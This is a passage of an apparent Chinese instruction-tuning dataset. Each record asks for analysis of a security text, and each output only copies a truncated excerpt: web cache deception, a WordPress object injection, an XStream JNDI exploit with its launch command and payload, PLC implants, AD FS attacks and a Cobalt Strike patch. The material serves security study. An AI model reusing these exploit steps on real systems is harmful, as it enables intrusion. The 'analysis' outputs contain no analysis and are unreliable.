"category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Web Cache Deception ## Summary * [Tools](#tools) * [Exploit](#exploit) * [Methodology - Caching Sensitive Data](#methodology---caching-sensitive-data) * [Methodology - Caching Custom JavaScript](#methodology---caching-custom-javascript) * [CloudFlare Caching](#cloudflare-caching) * [Labs](#labs) * [References](#references) ## Tools * [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities. ## Exploit 1. Browser requests a resource such as `http://www.example.com/home.php/non-existent.css`. 2. Server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct to not cache this page. 3. The response goes through the proxy. 4. The proxy identifies that the file has a css extension. 5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter \"CSS\" file (non-existent.css) inside. ## Methodology - Caching Sensitive Data **Example 1** - Web Cache Deception on PayPal Home Page 1. Normal browsing, visit home : `https://www.example.com/myaccount/home/` 2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css` 3. The page is displayed as /home and the cache is saving the page 4. Open a private tab with the previous URL : `https://www.example.com/myaccount/home/malicous.css` 5. The content of the cache is displayed Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page [ **Example 2** - Web Cache Deception on OpenAI 1. Attacker crafts a dedicated .css path of the `/api/auth/session` endpoint. 2. Attacker distributes the link 3. Victims visit the legitimate link. 4. Response is cached. 5. Attacker harvests JWT Credentials. ## Methodology - Caching Custom JavaScript 1. Find an un-keyed input for a Cache Poisoning ```js Values: User-Agent Values: Cookie Header: X-Forwarded-Host Header: X-Host Hea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProtecting Data with Short- Lived Encryption Keys and Hardware Root of Trust Dan Griffin DefCon 2013 What does the NSA think?  The NSA has been public about:  The inevitability of mobile computing  The need to support cloud-based services  Even for use with secret data in the field  General Alexander, head of the NSA, recently spoke of using smartphones as ID cards on classified networks.  What works for them can work for you Introduction  Mobile devices are everywhere and leak like a sieve  But we know that there are more and more of them every day  So now do we stop the impending implosion? Current Technology Landscape  Why are mobile devices less secure  Too hard to enter secure passwords by thumb  Current antimalware is not up to the task  Some are owned by user (ByoD to work)  But Mobile devices are (nearly) all ARM  Which supports Trusted Platform Module 2.0  Some new ones are on Intel Atom with TPM 2.0  So whats holding them back from being secure What is needed to be secure?  Must measure the current state of the mobile device  TPM, measured boot, remote attestation  ARM TZ, SOC  Send bootlogs to the RAS  What measurements can we use?  Firmware hash, time, etc.  Create a statement of health (claim) signed by RAS  Send to mobile device  So mobile devices can prove it is healthy How to use the Health Claim  The Device can use the health claim  To send to service to prove status  To unlock data protected on the device  If the Device is measured to be insecure  Go to remediation  This is nothing new  works just like NAP today Remote Attestation Service (RAS)  Needs secure data from manufacturer  Only ELAM is protected by TPM  State of ELAM in Windows *  Still need traditional AM  Checks user mode code  Even that AM code is verified by the ELAM  How does the content provider trust the RAS  Registration Authority How does the RAS trust the Device? TPM BIOS Boot Loader Kernel Early Drivers Hash of next item(s) Boot Log [PCR data] [AIK pub] [Signature] Is TPM/RAS re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwordpress <5.8.3 对象注入漏洞 本文仅用于技术讨论与研究文中的实现方法切勿应用在任何违法场景如因涉嫌违法造成的一切不良 影响本文作者概不负责 本文由本人在今年2月份发表于奇安信攻防社区 https://forum.butian.net/share/1303 因此在 一些关于时间的描述上存在误差请谅解 0x00 漏洞描述 看了 wordpress 注入 CVE-2022-21661 的洞之后发现还存在另外一个对象注入漏洞具有管理 员权限的用户通过更改一些选项将有机会 getshell  0x01 漏洞影响 getshell 的条件 wordpress < 5.8.3 启用多站点模式 存在一条可用的反序列化链在本文中不会讲这个 这是 github 上的漏洞修复记录 因此这里的环境选择前一条提交 0x02 漏洞分析 这里是以我复现这个漏洞时候的角度来分析的因此会有一些弯路 漏洞入口点 首先来到 wp-admin/upgrade.php 这是管理员可以直接访问到的文件也是我认为的此漏洞的入口 点 https://github.com/WordPress/WordPress/commit/66bb979049fa1a515d031e53ab100d507e d7bc8b git clone https://github.com/WordPress/WordPress git checkout 7d20ea9 跟进 wp_upgrade 函数来到 wp-admin/includes/upgrade.php 首先看几个全局变量 $wp_db_version 在 wp-includes/version.php 中定义根据其定义处的注释 来看这是本安装程序的数据库版本在下一行中从数据库中取出了 db_version 赋值给 $wp_current_db_version 看这情况大概是一个是固定的数据库版本另一个是可变的 upgrade.php 会时不时地比较当发生改变时会进行一些操作 接下来看到我下的断点处进入 upgrade_all() 函数 这里就是在将两个版本进行比较一致时不发生任何变化不一致时运行后面的代码接着看下面 根据从数据库中取出的 db_version 也就是此处的 $wp_current_db_version 的大小会进行不同的 处理我们来关注断点处的 upgrade_280 函数 看到 1611 行的 is_multisite() 跟进 这是一个判断是否开启了多站点的函数这也是本漏洞的一个开启条件必须要开启多站点才可以开 多站点需要改配置文件我这里图省事儿直接改了判断条件 !is_multisite() 强行让他绕过了 继续看上面进入循环每次从 wp_options 表中取 20 条数据将每一条数据都进行反序列化漏洞 的点就在此处了因为 wp_options 中的数据大部分都是可控的我们可以通过管理员修改其值最后 进入反序列化 还有两个问题第一如何控制 db_version 的值让他进入我们想要进入的函数第二如何更改 wp_options 中的值 数据写入 其实这两个是同一个问题一并解决 wordpress 后台没有直接访问所有 options 的按钮但我们可 以访问 wp-admin/options.php 这里可以更改 db_options 中大部分的值包括 db_version 我们将其修改为 10300就满足了进入 漏洞函数的要求接下来我们尝试写入反序列化字符串 我们先随便选择一个选项写入反序列化字符串这里我首先选择的是 blogdescription 也就是博客 描述这个也可以在常规选项中更改更建议因为需要处理的值会更少调试没那么费力, post 的 数据会逐个进入 wp-includes/option.php 中的 update_option 来看几个比较重要的函数PS太 长截图截不完 这里首先说明一下 $option 是每个选项的键 $value 是每个选项的值 首先看到 sanitize_option 这个函数会根据不同的键来选择不同的处理方式比如一些一定会用整数的就会 intval 处理所以 选择的选项也是有讲究的我之前选择的 blogdescription 就因为这个函数而无法使用他会将一些 特殊字符编码导致无法正常反序列化这个可以慢慢尝试尽量选择这个函数不会进行太多处理的选 项 最终我选择的是 wp-admin/options-writing.php 中的 密码选择 options.php 中的 mailserver_pass 也一样是同一个一般来说密码对字符都不会有太多的限制至少这里是的 回到之前的 update_option 的代码稍微注意一下这里的比较 如果我们输入的选择没有发生改", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Time's Up Reverse Engineering, 400 points ## Description: > Time waits for no one. Can you solve this before time runs out? ## Solution: Let's run the attached file: ```console root@kali:/media/sf_CTFs/pico/Times_Up# ./times-up Challenge: (((((185787775) + (-952261277)) + ((-46657828) + (837965729))) - (((1568696032) + (1659000306)) + ((-603020797) + (1768531904)))) - ((((-1716398977) + (-1336981012)) + ((169639072) + (1679069168))) - (((967152949) + (541599975)) + ((1236322328) - (799424436))))) Setting alarm... Solution? Alarm clock ``` We got a mathematical expression, and shortly after, the program got killed by an alarm. How long is the alarm? Let's use `strace` to see: ```console root@kali:/media/sf_CTFs/pico/Times_Up# ./times-up Challenge: (((((185787775) + (-952261277)) + ((-46657828) + (837965729))) - (((1568696032) + (1659000306)) + ((-603020797) + (1768531904)))) - ((((-1716398977) + (-1336981012)) + ((169639072) + (1679069168))) - (((967152949) + (541599975)) + ((1236322328) - (799424436))))) Setting alarm... Solution? Alarm clock root@kali:/media/sf_CTFs/pico/Times_Up# strace ./times-up execve(\"./times-up\", [\"./times-up\"], 0x7ffc13ffff80 /* 22 vars */) = 0 brk(NULL) = 0x5569a8f2d000 access(\"/etc/ld.so.preload\", R_OK) = -1 ENOENT (No such file or directory) openat(AT_FDCWD, \"/etc/ld.so.cache\", O_RDONLY|O_CLOEXEC) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=138446, ...}) = 0 mmap(NULL, 138446, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7a2030000 close(3) = 0 openat(AT_FDCWD, \"/lib/x86_64-linux-gnu/libc.so.6\", O_RDONLY|O_CLOEXEC) = 3 read(3, \"\\177ELF\\2\\1\\1\\3\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0>\\0\\1\\0\\0\\0\\260A\\2\\0\\0\\0\\0\\0\"..., 832) = 832 fstat(3, {st_mode=S_IFREG|0755, st_size=1824496, ...}) = 0 mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7a202e000 mmap(NULL, 1837056, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7a1e6d000 mprotect(0x7fe7a1e8f000, 1658880, PROT_NONE) = 0 mmap(0x7fe7a1e8f000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVirGraf101: An Introduction to Virtual Graffiti Tottenkoph What is virtual graffiti?  Virtual objects and/or digital messages, images, animations, etc.  Applied to or viewable from public locations  Can be viewed through:  Computers  Mobile devices  Billboards  Signs  Side of buildings What were covering  History of graffiti  Examples  Legal concerns and implications  Who and why? History: Prehistoric  Supposedly done over 30,000 years ago  Started with cave paintings  Used animal bone and pigments  Debatable because:  Used during religious ceremonies  Sometimes endorsed by society History: Ancient Greece  First instance was in Ephesus  Etched in stone and mosaics  Supposedly a prostitution advert  Picture of:  Heart-shaped handprint  Footprint  Number History: Ancient Rome  Included: curses, quotes, alphabets, declarations of love, slogans  Some was preserved in Pompeii  Most well-known:  suspirium puellarum Celadus thraex  Address for Novellia Primigenia of Nuceria  mansueta tene History: Misc. Pre-Modern  Mayans at the site of Tikal in Guatemala  Vikings in Rome, Ireland, and Constantinople  Renaissance artists at Neros Domus Aurea  Signature Rock  French soldiers during the Napoleonic campaign of Egypt History: Modern Graffiti (60s-70s)  Used mostly by political activists and gangs  Moved from streets to subway systems  Goal: out-tag and out- bomb other artists  Polka dots, cross-hatches, and checkers became popular  Spray paint helped a lot  Top-to-bottoms came about History: Modern Graffiti (1980s)  Harder to be a graffiti artist because:  Crack  Police  Store owners  Metropolitan Transit Authority  As a result, street and rooftop graffiti became more popular. History: Modern Graffiti (2000s)  Utilized as guerilla advertising by companies  IBM  Sony  Mainstream pop culture started to catch on  Video games (Jet Set Radio Future, Rakugaki Okaku)  Clothes design (Marc Ecko) Tried and True brought to you by: Throwies and Floaties  Most common and popular forms of ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInformation Security Partners, LLC iSECPartners.com Attacking Web Services Alex Stamos alex@isecpartners.com Defcon XIII Scott Stender scott@isecpartners.com www.isecpartners.com Information Security Partners, LLC 2 Introduction  Who are we?  Founding Partners of Information Security Partners, LLC (iSEC Partners)  Application security consultants / researchers  Why listen to this talk?  As youll see, Web Services are being deployed all around us  All of this work is based upon our experiences with real enterprise web service applications  There are a lot of interesting research opportunities  Find out what we dont know  The latest version of these slides and tools are available here:  https://www.isecpartners.com/defcon.html www.isecpartners.com Information Security Partners, LLC 3 Introduction: What are Web Services?  Its an overloaded term (and a great way to raise VC)  For our purposes, web services are communication protocols that:  Use XML as the base meta-language to define communication  Provide computer-computer communication  Use standard protocols, often controlled by W3C, OASIS, and WS-I  Designed to be platform and transport-independent www.isecpartners.com Information Security Partners, LLC 4 Introduction: What are Web Services?  Why are they so compelling?  Web service standards are built upon well understood technologies  Adoption by large software vendors has been extremely quick  Web services are sometimes described as a panacea to solve interoperability issues  Lots of magic pixie dust  Are very easy to write: using System.ComponentModel; using System.Web.Services; namespace WSTest{ public class Test : System.Web.Services.WebService { [WebMethod] public string HelloWorld() { return \"Hello World; } } } www.isecpartners.com Information Security Partners, LLC 5 Introduction: What are Web Services?  Value to corporate management is easy to understand  Fake quote: Lets expose our Mainframe APIs through SOAP and use plentiful Java developers on Windows/L", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n中国.北京 KCon黑客大会 工业PLC远程控制实现 演讲人剑思庭 2 0 1 8 PART 01 个人介绍 目录 CONTENTS PART 02 架构/工具 PART 03 远控渗透 01 02 03 PART 01 个人介绍 剑思庭 工业网络安 全技术顾问 Rockwell Automation 工控安全 渗透和防御 PART 02 构架/工具 VPS Kali 边界路由器 核心防火墙 工业交换机 P-NAT 关闭102端口 STEP7 工程师站 S7-315-PN/DP 互联网 企业边缘网络 企业内网网络 企业工厂网络 http://snap7.sourceforge.net/ $ sudo add-apt-repository ppa:gijzelaar/snap7 $ sudo apt-get update $ sudo apt-get install libsnap71 libsnap7-dev $ pip install python-snap7 PART 03 远控渗透 悄无声息 PLC远控代码植入不能造成PLC重启 FB64 TCON FB65 TSEND FB66 TRCV FB67 TDISCON PLC IP地址 PLC CPU槽号 Block类型和No. 上载远控功能块 存储功能块为MC7 连接被远控PLC 装载功能块MC7文件 下装MC7文件到PLC PLC内完整的远控植入程序 TCP建立连接 参数 声明 数据类型 存储区 描述 REQ INPUT BOOL IQMDL 控制参数REQUEST启动建立由ID指定的连接的作业作业在上升 沿启动 ID INPUT WORD MD常数 与远程伙伴之间建立的连接或用户程序和操作系统通信层之间建立的 连接的标识号标识号必须与本地连接描述中的相关参数标识号相同取值范围W#16#0001至 W#16#0FFF DONE OUTPUT BOOL IQMDL DONE状态参数0作业尚未开始或仍在运行1无错执行 作业 BUSY OUTPUT BOOL IQMDL BUSY = 1作业尚未完成BUSY = 0作业完成 ERROR OUTPUT BOOL IQMDL ERROR状态参数?ERROR = 1处理作业期间出现错误 STATUS返回有关错误类型的详细信息 STATUS OUTPUT WORD MD STATUS状态参数故障信息 CONNECTIN_OUT ANY D 指向相关连接说明的指针(UDT 65)参见为使用TCP和ISO on TCP的开放通信连 接分配参数和为使用UDP的本地通信接入点分配参数 TCP发送数据 参数 声明 数据类型 存储区 描述 REQ INPUT BOOL IQMDL 控制参数REQUEST在上升沿开始发送作业数据从由DATA和LEN指定的区域 传送 ID INPUT WORD MD常数 将终止对连接的引用标识号必须与本地连接描述中的相关参数标识号相同 取值范围W#16#0001至W#16#0FFF LEN INPUT INT IQMDL 要使用作业发送的最大字节数参见使用的CPU和协议变量(connection_type)和可 传送数据长度之间的关系 DONE OUTPUT BOOL IQMDL DONE状态参数0作业尚未开始或仍在运行1无错执行作业 BUSY OUTPUT BOOL IQMDL BUSY = 1作业尚未完成无法触发新作业?BUSY = 0作业完成 ERROR OUTPUT BOOL IQMDL ERROR状态参数ERROR = 1处理时出错STATUS提供有关错误类型的 详细信息 STATUS OUTPUT WORD MD STATUS状态参数故障信息 DATA IN_OUT ANY IQMD 发送区域包含地址和长度地址指的是输入过程映像?输出过程映像?存储器位? 数据块注意不要使用BOOL类型的ARRAY作为发送区域 参数 声明 数据类型 存储区 描述 EN_R INPUT BOOL IQMDL 使能接收的控制参数EN_R =?时FB 64 \"TRCV\"准备接收正在处理 接收作业 ID INPUT WORD MD常数 将终止对连接的引用标识号必须与本地连接描述中的相关参数标识号相同 取值范围W#16#0001至W#16#0FFF LEN INPUT INT IQMDL 接收区域的长度(以字节为单位)关于LEN =?或LEN <>?的含义请参见上文(FB64 \"TRCV\"的接收模式)对于值的范围请参见使用的CPU和协议变量(connection_type)和可传送数据长度之间的关系 NDR OUTPUT BOOL IQMDL NDR状态参数?NDR = 0作业尚未开始或仍在运行?NDR = 1作业成功 完成 ERR", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOPTIGUARD: A SMART METER ASSESSMENT TOOLKIT July 14, 2012 Presented by: INGUARDIANS, INC. Don C. Weber, Senior Security Analyst don@inguardians.com White Paper OptiGuard: A Smart Meter Assessment Toolkit 2 July 14, 2012 Copyright 2012 InGuardians, Inc. TABLE OF CONTENTS 1.0 Role of Smart Meters_________________________________________________ 3 2.0 Risk Presented by the Optical Port ______________________________________ 4 3.0 OptiGuard _________________________________________________________ 7 4.0 Optical Port Risk Mitigations __________________________________________ 10 5.0 Conclusion _______________________________________________________ 11 6.0 Acknowledgements _________________________________________________ 12 OptiGuard: A Smart Meter Assessment Toolkit 3 July 14, 2012 Copyright 2012 InGuardians, Inc. 1.0 ROLE OF SMART METERS The meter portion of the electrical grids throughout the world is swiftly being converted to Smart Meters. The news is littered with public disclosures of smart meter sales and implementations.1 Smart Meters, one of the primary components of a utility's Advanced Metering Infrastructure (AMI), play an important role to improving the stability, efficiency, and reliability of the new, smarter electrical grid. Smart Meters accomplish this by providing utilities with accurate, real-time and historical, consumption data. Smart Meters also put in place mechanisms to manage the stability of the grid. They do this by controlling demand with the assistance of their customers. In a world where the demand for electricity is rapidly increasing,2 the Smart Meter offers one method to provide better management and ensure peak load reductions.3 As with all new technologies, Smart Meters are still being evaluated for security risks. For years utilities have been heavily dependent on the stability and resilience of the hardware that comprises their infrastructure. It is not unheard of for electrical equipment to have a forty-year-plus lifespan4 with twen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: '2' services: nginx: image: vulhub/nginx:1.4.2 volumes: - ./nginx.conf:/usr/local/nginx/conf/nginx.conf - ./www:/usr/local/nginx/html ports: - \"8080:80\" php: build: ./php-fpm/ volumes: - ./www:/var/www/html", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 计算机网络 - 传输层 <!-- GFM-TOC --> * [计算机网络 - 传输层](#计算机网络---传输层) * [UDP 和 TCP 的特点](#udp-和-tcp-的特点) * [UDP 首部格式](#udp-首部格式) * [TCP 首部格式](#tcp-首部格式) * [TCP 的三次握手](#tcp-的三次握手) * [TCP 的四次挥手](#tcp-的四次挥手) * [TCP 可靠传输](#tcp-可靠传输) * [TCP 滑动窗口](#tcp-滑动窗口) * [TCP 流量控制](#tcp-流量控制) * [TCP 拥塞控制](#tcp-拥塞控制) * [1. 慢开始与拥塞避免](#1-慢开始与拥塞避免) * [2. 快重传与快恢复](#2-快重传与快恢复) <!-- GFM-TOC --> 网络层只把分组发送到目的主机但是真正通信的并不是主机而是主机中的进程传输层提供了进程间的逻辑通信传输层向高层用户屏蔽了下面网络层的核心细节使应用程序看起来像是在两个传输层实体之间有一条端到端的逻辑通信信道 ## UDP 和 TCP 的特点 - 用户数据报协议 UDPUser Datagram Protocol是无连接的尽最大可能交付没有拥塞控制面向报文对于应用程序传下来的报文不合并也不拆分只是添加 UDP 首部支持一对一一对多多对一和多对多的交互通信 - 传输控制协议 TCPTransmission Control Protocol是面向连接的提供可靠交付有流量控制拥塞控制提供全双工通信面向字节流把应用层传下来的报文看成字节流把字节流组织成大小不等的数据块每一条 TCP 连接只能是点对点的一对一 ## UDP 首部格式 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/d4c3a4a1-0846-46ec-9cc3-eaddfca71254.jpg\" width=\"600\"/> </div><br> 首部字段只有 8 个字节包括源端口目的端口长度检验和12 字节的伪首部是为了计算检验和临时添加的 ## TCP 首部格式 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/55dc4e84-573d-4c13-a765-52ed1dd251f9.png\" width=\"700\"/> </div><br> - **序号** 用于对字节流进行编号例如序号为 301表示第一个字节的编号为 301如果携带的数据长度为 100 字节那么下一个报文段的序号应为 401 - **确认号** 期望收到的下一个报文段的序号例如 B 正确收到 A 发送来的一个报文段序号为 501携带的数据长度为 200 字节因此 B 期望下一个报文段的序号为 701B 发送给 A 的确认报文段中确认号就为 701 - **数据偏移** 指的是数据部分距离报文段起始处的偏移量实际上指的是首部的长度 - **确认 ACK** 当 ACK=1 时确认号字段有效否则无效TCP 规定在连接建立后所有传送的报文段都必须把 ACK 置 1 - **同步 SYN** 在连接建立时用来同步序号当 SYN=1ACK=0 时表示这是一个连接请求报文段若对方同意建立连接则响应报文中 SYN=1ACK=1 - **终止 FIN** 用来释放一个连接当 FIN=1 时表示此报文段的发送方的数据已发送完毕并要求释放连接 - **窗口** 窗口值作为接收方让发送方设置其发送窗口的依据之所以要有这个限制是因为接收方的数据缓存空间是有限的 ## TCP 的三次握手 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/e92d0ebc-7d46-413b-aec1-34a39602f787.png\" width=\"600\"/> </div><br> 假设 A 为客户端B 为服务器端 - 首先 B 处于 LISTEN监听状态等待客户的连接请求 - A 向 B 发送连接请求报文SYN=1ACK=0选择一个初始的序号 x - B 收到连接请求报文如果同意建立连接则向 A 发送连接确认报文SYN=1ACK=1确认号为 x+1同时也选择一个初始的序号 y - A 收到 B 的连接确认报文后还要向 B 发出确认确认号为 y+1序号为 x+1 - B 收到 A 的确认后连接建立 **三次握手的原因** 第三次握手是为了防止失效的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDouglas Bienstock and Austin Baker I AM AD FS AND SO CAN YOU 2019 FireEye 2019 FireEye  Whoami  What is AD FS and how does it work?  How do we find AD FS servers?  How can we attack AD FS?  How can we become (takeover) AD FS?  Tools and Demos  Best practices and mitigations  Goal: Understand AD FS, how we can attack it and why we want to, and how to keep it safe Roadmap 2019 FireEye 2019 FireEye  4.5 years of experience at Mandiant  IR and Red Team lead  Speaks fluent cloud Doug Bienstock - @doughsec 3 2019 FireEye 2019 FireEye  IR and Red Team  5.5 years at Mandiant  Teaches some classes and stuff  Plays some games and junk Austin Baker - @bakedsec 4 MSFT AD FS  WTF? 2019 FireEye 2019 FireEye  Single-Sign On (SSO) solution for applications that dont integrate directly to Active Directory  In plaintext: use AD creds for services/apps outside AD  Centralizes both authentication, identity management, token issuance  Basically required for any large org now  We must go deeper Active Directory Federated Services 6 2019 FireEye 2019 FireEye  Organizations are increasingly moving to the cloud  AD as a data/security boundary no longer exists  AD FS is commonly the gateway to the cloud for organizations  If we can own AD FS we can own the cloud  As security practitioners we must keep up with the move to the cloud OK  but why do we care? 7 2019 FireEye 2019 FireEye  Claims: Statements about a users identity  Description (type) and value  Attribute Store: Where claims are sourced from (e.g. AD)  Claims Rules: Business logic that takes incoming claims, apply conditions, and produce new outgoing claims based on those conditions. Applied in the claims pipeline  c:[Type == \"http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccou ntname\", Issuer == \"AD AUTHORITY\"] => issue(store = \"Active Directory\", types = (\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress\"), query = \";mail;{0}\", param = c.Value); Building blocks 8 2019 FireEye 2019 FireEye 1. Star", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# XStream 反序列化命令执行漏洞CVE-2021-21351 XStream是一个轻量级简单易用的开源Java类库它主要用于将对象序列化成XMLJSON或反序列化为对象 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞但是其 1.4.15 及之前版本黑名单存在缺陷攻击者可利用`javax.naming.ldap.Rdn$RdnEntry`及`javax.sql.rowset.BaseRowSet`构造JNDI注入进而执行任意命令 参考链接 - https://x-stream.github.io/CVE-2021-21351.html - https://paper.seebug.org/1543/ - https://www.veracode.com/blog/research/exploiting-jndi-injections-java - https://github.com/welk1n/JNDI-Injection-Exploit/ ## 漏洞环境 执行如下命令启动一个Springboot + XStream 1.4.15的环境 ``` docker compose up -d ``` 环境启动后我们向`http://your-ip:8080`发送一个正常的XML数据包将会得到预期返回 ![](1.png) ## 漏洞复现 由于目标环境Java版本高于8u191故我们需要借助[这篇文章](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)中给出的方法使用`org.apache.naming.factory.BeanFactory`加EL表达式注入的方式来执行任意命令 使用[这个工具](https://github.com/welk1n/JNDI-Injection-Exploit/)启动恶意JNDI服务器 ``` java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C \"touch /tmp/success\" -A 192.168.1.142 ``` ![](2.png) 使用上图中基于SpringBoot利用链的RMI地址作为`<dataSource>`的值构造POC如下 ``` POST / HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: application/xml Content-Length: 3184 <sorted-set> <javax.naming.ldap.Rdn_-RdnEntry> <type>ysomap</type> <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'> <m__DTMXRTreeFrag> <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'> <m__size>-10086</m__size> <m__mgrDefault> <__overrideDefaultParser>false</__overrideDefaultParser> <m__incremental>false</m__incremental> <m__source__location>false</m__source__location> <m__dtms> <null/> </m__dtms> <m__defaultHandler/> </m__mgrDefault> <m__shouldStripWS>false</m__shouldStripWS> <m__indexing>false</m__indexing> <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'> <fPullParserConfig class='com.sun.rowset.Jd", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Fiked包描述 FakeIKEd简称fiked是一个假的IKE守护进程它支持足够的标准和思科扩展可以以semi MitM的方式攻击常见不安全的基于IPsec身份验证设置的Cisco VPN PSK +XAUTHFiked可以模拟VPN网关的IKE响应程序以捕获XAUTH登录凭据; 目前fiked并没有full MitM的客户端 **资料来源**:http://www.roe.ch/FakeIKEd [fiked主页](http://www.roe.ch/FakeIKEd)|[Kali fiked Repo](http://git.kali.org/gitweb/?p=packages/fiked.git;a=summary) - 作者Daniel Roethlisberger - 许可证GPLv2 ## fiked包中包含的工具 ### fiked-Cisco VPN攻击工具 ``` root@kalifiked -h 用法fiked [-rdqhV] -g gw -k IDPSK [-k ..] [-u用户] [-l文件] [-L文件] -r 使用原始套接字forge ip src addr 匹配<网关>禁用-u -d 从tty分离并作为守护程序运行说明-q -q 静默模式不记录任何东西到stdout -h 显示帮助和退出 -V 显示版本和退出 -g gw 模拟网关VPN地址 -kik 预共享密钥亦称组密码共享秘密前缀为其组/密匙ID第一个-k设置默认值 -u 用户 下降到一个非特权用户的权限 -l 文件 附加结果到凭证日志文件 -L 文件 verbous 记录为文件而不是stdout ``` ## fiked用法示例 ``` root@kali:~#即将推出 ``` [原文链接](http://tools.kali.org/sniffingspoofing/fiked)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 dogcs 4.4 patch补丁分析 声明 加我们的社区 前 件对 JAVA端 aggressor/Aggressor.class aggressor/AggressorClient.class aggressor/browsers/Connect.class aggressor/browsers/Sessions.class aggressor/dialogs/AboutDialog.class aggressor/dialogs/ConnectDialog.class aggressor/headless/Start.class aggressor/MultiFrame.class aggressor/TabManager.class aggressor/windows/BeaconConsole.class aggressor/windows/CredentialManager.class aggressor/windows/DownloadBrowser.class aggressor/windows/FileBrowser.class aggressor/windows/Files.class aggressor/windows/KeystrokeBrowser.class aggressor/windows/ScreenshotBrowser.class aggressor/windows/SecureShellConsole.class beacon/BeaconC2.class beacon/BeaconData.class beacon/BeaconHTTP.class beacon/BeaconPayload.class beacon/BeaconSetup.class beacon/CommandBuilder.class 2 beacon/jobs/DesktopJob.class beacon/TaskBeacon.class beacon/TaskBeaconCallback.class beacon/Tasks.class c2profile/MalleableHook.class c2profile/MalleableStager.class cloudstrike/NanoHTTPD.class cloudstrike/WebServer.class common/AssertUtils.class common/AuthCrypto.class common/Authorization.class common/BeaconEntry.class common/CommonUtils.class common/Download.class common/Helper.class common/License.class common/ListenerConfig.class common/LoggedEvent.class common/MudgeSanity.class common/Requirements.class common/Starter.class common/Starter2.class common/TeamSocket.class dns/AsymmetricCrypto.class dns/BaseSecurity.class server/Beacons.class server/Listeners.class server/ManageUser.class server/Resources.class server/ServerUtils.class server/TeamServer.class ssl/SecureServerSocket.class 3 ssl/SecureSocket.class stagers/BeaconBindStagerX64.class stagers/BeaconBindStagerX86.class stagers/BeaconDNSStagerX86.class stagers/BeaconHTTPSStagerX64.class stagers/BeaconHTTPSStagerX86.class stagers/BeaconHTTPStagerX64.class stagers/BeaconHTTPStagerX86.class stagers/BeaconPipeStagerX86.class stagers/ForeignHTTPSStagerX86.class stagers/ForeignHTTPStagerX86.class stagers/ForeignReverseStagerX64.class stag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Wind: Adventures in Hacking Wind Farm Control Networks Jason Staggs, Ph.D. University of Tulsa Tulsa, Oklahoma whoami  Security researcher  Focus in control systems and network security  PhD in Computer Science from The University of Tulsa  Cellular networks, security engineering and forensics  Presented How to Hack your Mini Cooper  @ DEFCON 21  CAN bus tricks and message reverse engineering  I enjoy trying to break things...  Sometimes I try to fix them  Sometimes people dont listen 2 **Disclaimer**  All affected parties have been notified of identified security issues that are about to be presented  I am NOT a power grid engineer!  Dont try this at home (without permission) 3 Why Hack a Wind Farm?  Wind energy  Becoming the predominant source of renewable energy  4.7% of electricity generated in the United States in 2015  Contribution expected to climb to 20% by 2030  Increased reliance on wind energy draws attention to attackers  Modern wind farms are operated by computers and networks  Whats the worst 